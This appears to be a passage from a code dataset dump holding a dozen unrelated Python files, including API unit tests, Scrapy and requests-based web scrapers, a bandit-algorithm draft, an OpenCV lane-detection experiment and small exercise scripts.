self.assertEqual(resp.status_code, status.HTTP_500_INTERNAL_SERVER_ERROR)\n\n    def test_415_unsupported_media_type(self):\n        \"\"\" Test the media type checking handler \"\"\"\n        new_kitty = {'firstname': 'kitty', 'lastname': 'tabby'}\n        data = json.dumps(new_kitty)\n        resp = self.app.put('/customers/2', data= data, content_type='string')\n        self.assertEqual(resp.status_code, status.HTTP_415_UNSUPPORTED_MEDIA_TYPE)\n\n    def test_upgrade_credit_of_a_Customer(self):\n        \"\"\" Upgrade the credit of a customer\"\"\"\n        resp = self.app.put('/customers/2/upgrade-credit', content_type='application/json')\n        self.assertEqual(resp.status_code, status.HTTP_200_OK)\n        new_json = json.loads(resp.data)\n        self.assertEqual(new_json['credit_level'], 1)\n        self.assertEqual(new_json['valid'], True)\n\n    def test_upgrade_credit_of_a_Customer_not_available(self):\n        \"\"\" Upgrade the credit of a customer not available\"\"\"\n        resp = self.app.put('/customers/4/upgrade-credit', content_type='application/json')\n        self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)\n\n    def test_downgrade_credit_of_a_Customer(self):\n        \"\"\" Downgrade the credit of a customer\"\"\"\n        resp = self.app.put('/customers/2/downgrade-credit', content_type='application/json')\n        self.assertEqual(resp.status_code, status.HTTP_200_OK)\n        new_json = json.loads(resp.data)\n        self.assertEqual(new_json['credit_level'], -1)\n        self.assertEqual(new_json['valid'], False)\n\n    def test_downgrade_credit_of_a_Customer_not_available(self):\n        \"\"\" Downgrade the credit of a customer not available\"\"\"\n        resp = self.app.put('/customers/4/downgrade-credit', content_type='application/json')\n        self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)\n\n    def test_the_valid_status_turn_by_credit(self):\n        \"\"\" Test that 'valid' flips when changing the credit_level \"\"\"\n        resp = self.app.put('/customers/2/upgrade-credit', content_type='application/json')\n        self.assertEqual(resp.status_code, status.HTTP_200_OK)\n        new_json = json.loads(resp.data)\n        self.assertEqual(new_json['credit_level'], 1)\n        self.assertEqual(new_json['valid'], True)\n        resp = self.app.put('/customers/2/downgrade-credit', content_type='application/json')\n        self.assertEqual(resp.status_code, status.HTTP_200_OK)\n        new_json = json.loads(resp.data)\n        self.assertEqual(new_json['credit_level'], 0)\n        self.assertEqual(new_json['valid'], True)\n        resp = self.app.put('/customers/2/downgrade-credit', content_type='application/json')\n        self.assertEqual(resp.status_code, status.HTTP_200_OK)\n        new_json = json.loads(resp.data)\n        self.assertEqual(new_json['credit_level'], -1)\n        self.assertEqual(new_json['valid'], False)\n        resp = self.app.put('/customers/2/upgrade-credit', content_type='application/json')\n        self.assertEqual(resp.status_code, status.HTTP_200_OK)\n        new_json = json.loads(resp.data)\n        self.assertEqual(new_json['credit_level'], 0)\n        self.assertEqual(new_json['valid'], True)\n\n    def test_health_check(self):\n        \"\"\" Test the healthcheck url\"\"\"\n        resp = self.app.get('/healthcheck')\n        self.assertEqual(resp.status_code, status.HTTP_200_OK)\n        new_json = json.loads(resp.data)\n        self.assertEqual(new_json['message'], 'Healthy')\n######################################################################\n# Utility functions\n######################################################################\n\n    def get_customer_count(self):\n        \"\"\" return the current number of customers \"\"\"\n        resp = self.app.get('/customers')\n        self.assertEqual(resp.status_code, status.HTTP_200_OK)\n        data = json.loads(resp.data)\n        
return len(data)\n\n\n######################################################################\n# M A I N\n######################################################################\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_server.py","file_name":"test_server.py","file_ext":"py","file_size_in_byte":12936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"192880671","text":"# *_*coding:utf-8 *_*\n# 浙江2019年选考科目范围\n#按地区_每个地区单独输入网址\nimport scrapy\n# import logging\n# from copy import deepcopy\n\n\n# logger = logging.getLogger(__name__)\n\nclass SubjectSpider(scrapy.Spider):\n name = 'zj2019' #爬虫的名字\n allowed_domains = ['zjzs.net'] # 设置爬取的范围\n start_urls = ['http://zt.zjzs.net/xk2019/area_0_0.html'] # 最开始的url请求\n base_url = 'http://zt.zjzs.net/xk2019/'\n def parse(self, response):\n # 遍历地区 直接写出来拼到url\n # area_list = [\n # 'area_0_0.html', 'area_0_1.html', 'area_0_2.html', 'area_0_3.html', 'area_0_4.html',\n # 'area_0_5.html', 'area_0_6.html', 'area_0_7.html', 'area_0_8.html', 'area_0_9.html',\n # 'area_0_10.html','area_0_11.html',\n # 'area_1_0.html', 'area_1_1.html', 'area_1_2.html', 'area_1_3.html', 'area_1_4.html',\n # 'area_1_5.html', 'area_1_6.html', 'area_1_7.html', 'area_1_8.html', 'area_1_9.html',\n # 'area_1_10.html','area_1_11.html',\n # 'area_2_0.html', 'area_2_1.html', 'area_2_2.html', 'area_2_3.html', 'area_2_4.html',\n # 'area_2_5.html', 'area_2_6.html', 'area_2_7.html'\n # ]\n\n area_list = ['area_0_0.html', 'area_0_1.html'] # test 测试两个地区 成功\n for area in area_list:\n area_url = self.base_url + area\n # 获取详情页的url\n yield scrapy.Request(\n area_url,\n callback=self.parse_area\n )\n\n def parse_area(self, response):\n # 获取遍历的列表页\n li_list = response.xpath(\"//div[@class='dis']/table[2]//tr\")[1:] # 过滤表头第一个数据\n for li in li_list:\n item = {}\n # item['Area'] = li.xpath(\"./td[1]/text()\").extract_first()\n item['Rucode'] = li.xpath(\"./td[2]/text()\").extract_first()\n item['SchoolName'] = li.xpath(\"./td[3]/text()\").extract_first()\n # item['href'] = li.xpath(\"./td[4]/a/@href\").extract_first()\n\n detail = li.xpath(\"./td[5]/a/@href\").extract_first() # 10001.html\n detail = self.base_url + detail\n # 获取详情页的url\n yield scrapy.Request(\n detail,\n callback=self.parse_detail,\n meta={\"item\": item} # 使用meta在不同的解析函数中传递数据\n )\n\n def parse_detail(self,response):\n item = response.meta[\"item\"]\n li_trs = response.xpath(\"//div[@class='search']//table/tr\")[1:] # 过滤掉表头信息\n li_tr = li_trs[::2]\n for tr in li_tr:\n professioanl = []\n item['Level'] = tr.xpath(\"./td[1]/text()\").extract_first() # 层次\n item['ProfessionalType'] = tr.xpath(\"./td[2]/text()\").extract_first() # 专业名称\n # dic['ScopeCount'] = int(tr.xpath(\"./td[3]/text()\").extract_first()) # 选考科目数\n item['Scope'] = sorted(tr.xpath(\"./td[4]/text()\").extract_first().split()) # 选考科目范围\n # 新增科目限制状态字段 0为不限 1为限一科 2为限两科 3为限三科\n # 注意:以下代码仅适用于2019浙江\n if '不限' in item['Scope']:\n item['ScopeStatus'] = 0\n else:\n item['ScopeStatus'] = 1\n item['ScopeArea'] = [\n {\n \"Province\" : \"浙江省\",\n \"ScopeTime\" : \"2019\"\n }\n ]\n ContainsProfessional = tr.xpath(\"./td[5]/text()\").extract() # 专业\n if ContainsProfessional:\n item['ProfessionalName'] = ContainsProfessional\n else:\n if '类' in item['ProfessionalType']:\n item['ProfessionalName'] = []\n else:\n professioanl.append(item['ProfessionalType'])\n item['ProfessionalName'] =professioanl\n # logger.warning(item)\n\n\n yield 
item","sub_path":"myscrapy/spiders/zj2019_Spider.py","file_name":"zj2019_Spider.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"239428681","text":"import numpy as np\nfrom numpy import exp\nfrom numpy.random import choice\nfrom scipy.optimize import linear_sum_assignment as hungarian\n\nfrom Bandit import Bandit\nfrom BanditEvaluator import BanditEvaluator\n\nclass CombinatorialBandits(Bandit):\n\t\"\"\"--------------------------------------------------------------------\n\tNotation (variable names, etc.) is based on Gai Y. et al., \n\t\"Combinatorial Network Optimization With Unknown Variables: Multi-Armed\n\tBandits With Linear Rewards and Individual Observations\"\n\t\n\ttheta: list of mean estimates\n\tm: number of occurences of arms at slates\n\t--------------------------------------------------------------------\"\"\"\n\t\n\tdef __init__(self, item_count, slate_size, rounds):\n\t\tself.item_count = item_count\n\t\tself.slate_size = slate_size\n\t\tself.evaluator = BanditEvaluator(item_count=item_count, eval_method=\"reward\")\n\t\tself.theta = np.zeros(item_count)\n\t\tself.m = np.zeros(item_count)\n\t\tself.regret_log = [0]\n\t\t\n\t\t# Initialize the variables\n\t\tuniform = (1/(item_count-1)) * np.ones(item_count-1)\n\t\tfor p in range(item_count):\n\t\t\tslate_idx = choice((item_count-1), (slate_size-1), p=uniform, replace=False)\n\t\t\tslate = [1 if i in slate_idx else 0 for i in range(item_count-1)]\n\t\t\tslate = np.insert(slate, p, 1)\n\t\t\treward = self.evaluator.evaluate_slate(slate)[0]\n\t\t\tself.theta = [(t*self.m[i]+reward[i])/(self.m[i]+1) if(slate[i]) else t for i,t in enumerate(self.theta)]\n\t\t\tself.m += slate\n\t\tprint(self.m)\n\t\tprint(self.theta)\n\n\tdef run(self):\n\t\tfor n in range(self.horizon):\n\t\t\t# cost_matrix = ?\n\t\t\tslate = np.array(hungarian(cost_matrix)[0])\n\t\t\tslate_eval, optimal_eval = self.evaluator.evaluate_slate(slate)\n\t\t\tself.theta = [(t*self.m[i]+reward[i])/(self.m[i]+1) if(slate[i]) else t for i,t in enumerate(self.theta)]\n\t\t\tself.m += slate\t\n\t\n\tdef calc_regret(self, slate_eval, optimal_eval):\n\t\tself.regret_log.append((sum(optimal_eval) - sum(slate_eval)) + self.regret_log[-1])\n\n","sub_path":"CombinatorialBandits.py","file_name":"CombinatorialBandits.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"277807022","text":"import glob\r\nfrom match.utils import *\r\n\r\ndef findTemplateSeparateVersion(path,file,jsonDir):\r\n\tjsonFiles=glob.glob(jsonDir)\r\n\tminDistance=100000\r\n\tstarPos=jsonDir.find('*')\r\n\tfor jsonFile in jsonFiles:\r\n\t\tCONFIG,HF_CONFIG=initCONFIG(jsonFile) # HF_CONFIG for fun\r\n\t\tlineList=preProcessPdf(file)\r\n\t\tlineList=fixScript(lineList)\r\n\t\tfor key in CONFIG: key=fixSpaceColonString(key)\r\n\t\tconfigString=createStringList(CONFIG)\r\n\t\tsList,aliasDict=createListOfStringLineList(CONFIG,lineList,configString)\r\n\t\t# New keys\r\n\t\tnewKwList=generateListNewKws(file,jsonFile[starPos:-5],CURR_KW,jsonDir)\r\n\t\tfor key in newKwList:\r\n\t\t\tfor tmpKey in aliasDict:\r\n\t\t\t\tfound=0\r\n\t\t\t\tfor element in aliasDict[tmpKey]:\r\n\t\t\t\t\tif element.find(key)!=-1:\r\n\t\t\t\t\t\tnewKwList.remove(key)\r\n\t\t\t\t\t\tfound=1\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\tif (found): break\r\n\t\tfor s in 
sList:\r\n\t\t\tdis=getDamerauDistance(configString,s,aliasDict)\r\n\t\t\tdis+=len(newKwList)*0.5\r\n\r\n\t\t\t# Testing===========================================================================\r\n\t\t\t# print('=========================================================================')\r\n\t\t\t# print('Standard string:',configString)\r\n\t\t\t# print('Target S:',s)\r\n\t\t\t# print('Distance:',dis)\r\n\t\t\t# print('Template:',jsonFile[starPos:-5])\r\n\t\t\t# print('=========================================================================')\r\n\t\t\t# Testing==========================================================================\r\n\t\t\tif (minDistance>dis):\r\n\t\t\t\tminDistance=dis\r\n\t\t\t\tans=jsonFile[starPos:-5]\r\n\t\t\t\ttargetConfigString=configString\r\n\t\t\t\ttargetS=s\r\n\t\t\t\ttargetCONFIG=CONFIG\r\n\t\t\t\ttargetAliasDict=aliasDict\r\n\t\t\t\ttargetNewKwList=newKwList\r\n\r\n\t\t\t\t# Testing===========================================================================\r\n\t\t\t\tprint('=========================================================================')\r\n\t\t\t\tprint('Standard string:',configString)\r\n\t\t\t\tprint('Target S:',s)\r\n\t\t\t\tprint('Distance:',minDistance)\r\n\t\t\t\tprint('Template:',jsonFile[starPos:-5])\r\n\t\t\t\tprint('New keywords:',newKwList)\r\n\t\t\t\tprint('=========================================================================')\r\n\t\t\t\tif (minDistance==0 or minDistance>15): break\r\n\t\t\t\t# Testing==========================================================================\r\n\t\tif (minDistance==0): break\r\n\r\n\t# print(file)\r\n\tif (minDistance>8): return -1\r\n\r\n\treturn ans\r\n\r\n# def main():\r\n# \tpath='matching/random'\r\n# \tjsonDir='template/*json'\r\n# \tpdfFiles=glob.glob('matching/random/*pdf')\r\n# \tfor file in pdfFiles:\r\n# \t\tprint(file[16:],findTemplateSeparateVersion(path,file,jsonDir))\r\n\r\n# if __name__=='__main__': main()\r\n","sub_path":"Source/match/separateMatching.py","file_name":"separateMatching.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"224509671","text":"with open(\"input\") as f:\n\tlines = f.read().splitlines()\n\ncount = 0\nfor line in lines:\n\tfirst, second = [[int(val) for val in span.split(\"-\")] for span in line.split(\",\")]\n\tif first[0] <= second[0] and first[1] >= second[1] or second[0] <= first[0] and second[1] >= first[1]:\n\t\tcount += 1\n\nprint(count)\n","sub_path":"2022/day04/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"292256139","text":"from NLG.NLG.pynlg.realizer import Clause, ImperativeClause, PrepositionalPhrase, NounPhrase\nfrom NLG.NLG.pynlg.lexicon import Word, XMLLexicon, Noun\n\n\n\n\ndef setUp():\n\n\tlex = XMLLexicon() \n\t#the woman kissed the man behind the curtain\n\ts1 = Clause()\n\tnp_woman = s1.add_subject(lex.getWord(\"woman\"))\n\tnp_woman.add_determiner(lex.getWord(\"the\"))\n\tvp_kiss = s1.add_verb(lex.getWord(\"abandon\", \"VERB\"))\n\tnp_the_curtain = NounPhrase(lex.getWord(\"curtain\", \"NOUN\"), determiner=lex.getWord(\"the\"))\n\tpp_the_curtain = PrepositionalPhrase(lex.getWord(\"behind\", \"PREPOSITION\"), [np_the_curtain]) \n\tvp_kiss.add_prepositional_phrase(pp_the_curtain)\n\t\n\tnp_man = vp_kiss.add_object(lex.getWord(\"man\"))\n\tnp_man.add_determiner(lex.getWord(\"the\")) 
\n\ts1.set_verb_tense(\"past\")\n\tprint(s1.realize())\n\n\n","sub_path":"WebApp/summe_project/summe_app/Summarizer/NLG/Sample.py","file_name":"Sample.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"263839238","text":"import requests\nimport urllib.request\nimport os\nimport urllib.error\nimport socket\nimport re\n\n#from common import clean_title\n\nkeyword = '周杰伦'\ntimeout = 3.0\nsocket.setdefaulttimeout(timeout)\n\nclass YinYueTaiSpider(object):\n def clean_title(self, filename):\n # 将非法字符替换成'-'\n title = re.sub('[\\/:*?\"<>|]', '-', filename)\n return title\n\n def Schedule(self,a, b, c):\n \"\"\"\n a:已经下载的数据块\n b:数据块的大小\n c:远程文件的大小\n \"\"\"\n per = 100.0 * float(a * b) / float(c)\n if per > 100:\n per = 100\n # print(\"已经下载:\", a)\n # print(\"数据块大小:\", b)\n # print(\"程文件大小:\", c)\n print('{:.2f}%'.format(per),end=\" || \")\n\n\n def get_index(self, url):\n try:\n response = requests.get(url)\n if response.status_code == 200:\n json = response.json()\n return json\n return None\n except ConnectionError:\n return None\n\n def get_page_count(self):\n # 获取mv总页数\n get_page_url = 'http://soapi.yinyuetai.com/search/video-search?keyword={0}&pageIndex=1&pageSize=24'\\\n .format(keyword) # keyword是艺人名\n try:\n response = requests.get(get_page_url)\n if response.status_code == 200:\n json = response.json()\n page_count = json.get('pageInfo')['pageCount'] # 获取总页数\n return page_count\n return None\n except ConnectionError:\n return None\n\n def get_mv_info(self, json):\n # 获取mv的id、标题\n if json.get('videos'):\n items = json.get('videos')['data']\n for item in items:\n video_id = item.get('id')\n title = item.get('title')\n yield {\n 'video_id': video_id,\n 'title': title,\n }\n\n def get_mv_source_url(self, video_id):\n # 构造mv真实地址\n mv_source_url = 'http://www.yinyuetai.com/api/info/get-video-urls?flex=true&videoId={}'.format(video_id)\n json_dict = requests.get(mv_source_url).json()\n mv_source_dict = {\n 'SD_MV': json_dict[\"hdVideoUrl\"] if \"hdVideoUrl\" in json_dict else None,\n 'HD_MV': json_dict[\"hcVideoUrl\"] if \"hcVideoUrl\" in json_dict else None,\n 'FHD_MV': json_dict[\"heVideoUrl\"] if \"heVideoUrl\" in json_dict else None,\n }\n\n mv_source_list = []\n\n for key, value in mv_source_dict.items():\n if value is not None:\n mv_source_list.append(value)\n return mv_source_list\n\n def download_mv(self, mv_source_list, title, video_id): # 下载最高品质的视频\n # 创建存放视频的文件夹\n file = '{}/'.format(keyword)\n if not os.path.exists(file):\n os.mkdir(file)\n print('创建文件夹:', file)\n\n # 处理下载过程中的异常\n try:\n # 判断视频文件是否存在,并且给视频文件名做处理,将不合法的字符用'-'替代\n if not os.path.exists(file + self.clean_title(title) + '-' + str(video_id) + '.mp4'):\n print('Start Download MV:' + title + '...:', mv_source_list[-1])\n urllib.request.urlretrieve(url=mv_source_list[-1], filename=file + self.clean_title(title) + '-' + str(video_id) + '.mp4', reporthook=self.Schedule)\n print('MV Download Success:', title)\n else:\n print('MV:{}-已存在'.format(self.clean_title(title)))\n except socket.timeout:\n # 解决下载时间过长甚至出现死循环的情况\n count = 1\n while count <= 2:\n try:\n urllib.request.urlretrieve(url=mv_source_list[-1], filename=file + self.clean_title(title) + '-' + str(video_id) + '.mp4')\n print('MV Download Success:', title)\n break\n except socket.timeout:\n err_info = 'Reloading for %d time' % count if count == 1 else 'Reloading for %d times' % count\n print(err_info)\n count += 1\n if count > 2:\n print(\"Downloading MV Failed!\")\n\n def 
main(self):\n page_count = self.get_page_count()\n mv_count = 0\n for page in range(1, page_count):\n print('Crawl Page:', page)\n url = 'http://soapi.yinyuetai.com/search/video-search?keyword={0}&pageIndex={1}&pageSize=24'.format(keyword,\n page)\n json = self.get_index(url)\n for item in self.get_mv_info(json):\n mv_count += 1\n video_id = item['video_id']\n title = item['title']\n mv_source_list = self.get_mv_source_url(video_id)\n self.download_mv(mv_source_list, title, video_id)\n print('已下载MV数量:', mv_count)\n\n\nif __name__ == '__main__':\n mv = YinYueTaiSpider()\n mv.main()\n\n","sub_path":"spider_MV_yinYueTai.py","file_name":"spider_MV_yinYueTai.py","file_ext":"py","file_size_in_byte":5241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"381228528","text":"def fun():\n m=int(input(\"Enter the first number:\")) \n n=int(input(\"Enter the second number:\")) \n if(m==n):\n print(\"Numbers are equal\")\n else:\n print(\"Numbers are not equal\") \n if(m+n==5):\n print(\"They adds up to 5\") \n else:\n print(\"They does not adds up to 5\") \n if(m-n==5):\n print(\"Their difference is 5\")\n else:\n print(\"Their difference is not 5\") \nfun()","sub_path":"lab8-5.py","file_name":"lab8-5.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"328821708","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 6 21:14:59 2020\n\n@author: estanislau\n\"\"\"\n\nimport cv2\nimport glob\nimport numpy as np\n\n\n\nnumero_pasta = 2\n\ncaminho_pasta = '/home/estanislau/Projetos/Atena/Frames/frames_video_fxa_'+str(numero_pasta)+'/*.jpg'\n\npt_pista_1, pt_pista_2, pt_pista_3, pt_pista_4 = (70,340), (570,340), (10,410), (620,410)\npt_destino_1, pt_destino_2, pt_destino_3, pt_destino_4 = (150,0), (480,0), (150,420), (480,420)\n\npontos_pista = np.float32([[pt_pista_1], [pt_pista_2], [pt_pista_3], [pt_pista_4]])\npontos_destino = np.float32([[pt_destino_1], [pt_destino_2], [pt_destino_3], [pt_destino_4]])\n\n\ndef perspectiva_pista(img):\n '''\n\tcv2.line(img, pt_pista_1, pt_pista_2, (0,0,255), 4)\n\tcv2.line(img, pt_pista_1, pt_pista_3, (0,0,255), 4)\n\tcv2.line(img, pt_pista_2, pt_pista_4, (0,0,255), 4)\n\tcv2.line(img, pt_pista_3, pt_pista_4, (0,0,255), 4)\n\n\tcv2.line(img, pt_destino_1, pt_destino_2, (0,255,0), 4)\n\tcv2.line(img, pt_destino_1, pt_destino_3, (0,255,0), 4)\n\tcv2.line(img, pt_destino_2, pt_destino_4, (0,255,0), 4)\n\tcv2.line(img, pt_destino_3, pt_destino_4, (0,255,0), 4)\n '''\n matriz = cv2.getPerspectiveTransform(pontos_pista, pontos_destino)\n img = cv2.warpPerspective(img, matriz, (680, 420)) \n return img\n\n\n\ndef filtros_faixas(img):\n\timg_cinza = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\timg_blur = cv2.GaussianBlur(img_cinza,(5,5),0)\n\t\n\t# Binariza a imagem, definindo regiões pretas e brancas. 
Para visualizar a imagem binarizada comentar linhas abaixo\n\timg_tresh = cv2.inRange(img_blur, 240, 255) \n\n\treturn img_tresh\n\n\n\ndef detecta_faixas(img):\n\t# Color thresholding\n\tret,thresh = cv2.threshold(img,145,250,cv2.THRESH_BINARY_INV)\n\t\n\t# Find the contours of the frame\n\tcontours, hierarchy = cv2.findContours(thresh.copy(), 1, cv2.CHAIN_APPROX_NONE)\n\t\n\tif len(contours) > 0:\n\t\tc = max(contours, key=cv2.contourArea)\n\t\t\n\t\tM = cv2.moments(c)\n\n\t\tcx = int(M['m10']/M['m00'])\n\n\t\tcy = int(M['m01']/M['m00'])\n\n\t\tcv2.line(img,(cx,0),(cx,420),(255,0,0),1)\n\n\t\tcv2.line(img,(0,cy),(680,cy),(255,0,0),1)\n\n\t\tcv2.drawContours(img, contours, -1, (0,255,0), 1)\n\n\t\treturn img, cx\n\ncont_imagem = 1000\n\nquantidade_imagens = len((glob.glob(caminho_pasta)))\n\ntry: \n \n for i in sorted(glob.glob(caminho_pasta)): \n imagem = cv2.imread(i)\n \n quantidade_imagens -= 1\n \n # Imagens da perspectiva da pista sem filtros aplicados\n imagem_pista = perspectiva_pista(imagem)\n \n # Imagem da perspectiva da pista pista com aplicação dos filtros \n imagem_pista_filtrada = filtros_faixas(imagem_pista)\n \n # Imagem da faixa da esquerda\n imagem_faixa_esq = imagem_pista_filtrada[0:420, 100:360]\n imagem_faixa_esq, cx_esq = detecta_faixas(imagem_faixa_esq.copy())\n \n # Imagem da faixa da direta\n imagem_faixa_dir = imagem_pista_filtrada[0:420, 300:560] \n imagem_faixa_dir, cx_dir = detecta_faixas(imagem_faixa_dir.copy())\n \n correcao_esq, correcao_dir = False, False\n \n if cx_esq >= 59 and cx_esq <= 105:\n correcao_esq = True\n elif cx_dir >= 154 and cx_dir <= 198:\n correcao_dir = True\n \n print(\"Corrigir_MT_Esq: {0} | Corrigir_MT_Dir: {1} | Frame: {2}\\n\".format(correcao_esq, correcao_dir, cont_imagem))\n \n \n cv2.imshow(\"Perspectiva Pista Filtrada\", imagem_pista_filtrada)\n cv2.imshow(\"Faixa Esquerda\", imagem_faixa_esq)\n cv2.imshow(\"Faixa Direita\", imagem_faixa_dir)\n cv2.waitKey(0)\n \n if quantidade_imagens == 0:\n print(\"Todas as imagens analisadas com sucesso!\")\n cv2.destroyAllWindows()\n break\n \n if cv2.waitKey(1) & 0xFF == 27:\n cv2.destroyAllWindows()\t\n \n cont_imagem += 1\n \n \nexcept KeyboardInterrupt:\n cv2.destroyAllWindows()\n print('Encerrar execução...') \n \nfinally:\n cv2.destroyAllWindows()\n","sub_path":"Experimentos/Faixas/avaliacao_frames.py","file_name":"avaliacao_frames.py","file_ext":"py","file_size_in_byte":3988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"424897502","text":"import random\n\nn = int(input(\"list length = \"))\na = int(input(\"min = \"))\nb = int(input(\"max = \"))\narr = []\nsum = 0\n\nfor i in range(n):\n arr.append(random.randint(a, b))\n\nprint(\"X = \"+str(arr))\n\nk = int(input(\"k = \"))\n\nfor i in range(1, len(arr)-1):\n if (arr[i-1] + arr[i+1]) < k:\n sum += arr[i]\n\nprint(sum)\n","sub_path":"hometask_8/+bonus/333.py","file_name":"333.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"303602231","text":"import sys\nimport os\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ndef ss_composition(ss_file):\n f = open(ss_file, \"r\") \n h_counter = 0\n e_counter = 0\n coil_counter = 0\n total_counter = 0\n for line in f:\n for letter in line:\n if letter == \"H\":\n h_counter += 1 \n total_counter += 1\n elif letter == \"E\":\n e_counter += 1\n total_counter += 1\n elif letter == \"-\":\n coil_counter += 1\n total_counter += 1\n\n a = 
open(\"ss_total_count.txt\", \"w+\")\n\n h_percent = \"{0:.2f}\".format((h_counter/total_counter) * 100)\n e_percent = \"{0:.2f}\".format((e_counter/total_counter) * 100)\n c_percent = \"{0:.2f}\".format((coil_counter/total_counter) * 100)\n\n\n a.write(\"H=\" + str(h_counter) + \"=\" + str(h_percent) + \"%\\n\" + \"E=\" + str(e_counter) + \"=\" + str(e_percent) + \"%\\n\" + \"-=\" + str(coil_counter) + \"=\" + str(c_percent) + \"%\\n\" + \"TOT=\" + str(total_counter))\n\n\n df = pd.DataFrame([h_counter, e_counter, coil_counter], index = ['Helix ' + h_percent + \"%\" , 'Strand ' + e_percent + \"%\" , 'Coil ' + c_percent + \"%\" ], columns=[''])\n df.plot(kind='pie', subplots=True, figsize=(8, 8), legend = None)\n plt.savefig('ss_composition.png')\n return()\n\n\nif __name__ == \"__main__\":\n ss_file = sys.argv[1]\n ss_composition(ss_file)\n","sub_path":"scripts/statistics/ss_composition.py","file_name":"ss_composition.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"296669702","text":"# Authon :wang\nimport requests\nimport unittest\nimport time\nfrom SamplesInterface.common.logger import Log\nfrom SamplesInterface.config.getCookies import CookiesUtil\n\ncookies = CookiesUtil()\nCookie = CookiesUtil.cookies\nqa_ip = CookiesUtil.qa_ip\nqa_port = CookiesUtil.qa_port\nqa_http = CookiesUtil.qa_http\n\n\nclass Test(unittest.TestCase):\n log = Log()\n\n def setUp(self):\n self.headers = {\n \"Accept\": \"image/webp,image/apng,image/*,*/*;q=0.8\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36\",\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Accept-Language\": \"zh-CN,zh;q=0.9\",\n \"Cookie\": Cookie\n }\n\n def tearDown(self):\n # print(self.result)\n pass\n\n def test_1_alarmCenter_queryAlarmStoreList(self):\n '''报警中心-算分top30接口'''\n self.log.info(\"------ 报警中心-算分top30接口:start!---------\")\n self.alarmCenter_queryAlarmStoreList_url = '' + qa_http + '://' + qa_ip + ':' + qa_port + '/alarmCenter/queryAlarmStoreList'\n r = requests.get(self.alarmCenter_queryAlarmStoreList_url, headers=self.headers, verify=False)\n print(self.alarmCenter_queryAlarmStoreList_url)\n self.result = r.json()\n self.log.info(\"------ 报警中心-算分top30接口:响应结果:%s\" % self.result)\n self.status_code = r.status_code\n self.assertEqual(self.status_code, 200)\n print(self.result)\n print(self.result['vehicleId'])\n self.log.info(\"------ 报警中心-算分top30接口:end!---------\")\n\n def test_2_alarmCenter_queryAlarmTopTen(self):\n '''报警中心-top10 接口'''\n self.log.info(\"------ 报警中心-top10 接口:start!---------\")\n self.alarmCenter_queryAlarmTopTen_url = '' + qa_http + '://' + qa_ip + ':' + qa_port + '/alarmCenter/queryAlarmTopTen?vehicleId=300007&pageNo=1&pageSize=10'\n r = requests.get(self.alarmCenter_queryAlarmTopTen_url, headers=self.headers, verify=False)\n print(self.alarmCenter_queryAlarmTopTen_url)\n self.result = r.json()\n self.log.info(\"------ 报警中心-top10 接口:响应结果:%s\" % self.result)\n self.status_code = r.status_code\n self.assertEqual(self.status_code, 200)\n # self.assertTrue(self.result['success'])\n print(self.result)\n self.log.info(\"------ 报警中心-top10 接口:end!---------\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"SamplesInterface/case/case02_alarmCenter/test03.py","file_name":"test03.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} 
+{"seq_id":"123334979","text":"# -*- coding:utf-8 -*-\n\nfrom bs4 import BeautifulSoup\nimport requests\nfrom operator import itemgetter\n#import collections\n#from selenium import webdriver\n#from selenium.webdriver.support.wait import WebDriverWait\n#from selenium.webdriver.support import expected_conditions as EC\n#from selenium.webdriver.common.by import By\n\nimport re\n\nurl_base = \"https://www.youtube.com/results?search_query=Chitãozinho+e+Chororó\"\nurls = []\nnomes = []\nvisualizacoes = []\n\nconexao = requests.get(url_base)\nsopa_dados = BeautifulSoup(conexao.text, 'html.parser')\ndados = sopa_dados.findAll('a', attrs={'class':'yt-uix-tile-link'})\n\nfor i in dados:\n url = \"https://www.youtube.com\" + i['href']\n urls.append(url)\n nome = i['title']\n nomes.append(nome)\nfor i in range(0, len(urls)):\n #print(urls[i])\n #print(nomes[i])\n conexao = requests.get(urls[i])\n sopa_videos = BeautifulSoup(conexao.text, 'html.parser')\n visu = sopa_videos.find('div', class_=\"watch-view-count\")\n if(visu == None):\n visualizacoes.append(0)\n # print('É um usuário')\n else:\n visu = visu.text\n visu = int(re.sub('[^0-9]', '', visu))\n # print(visu)\n # print(type(visu))\n visualizacoes.append(visu)\n #print('-'*100)\n\ndic = {}\nfor i in range(0, len(nomes)):\n 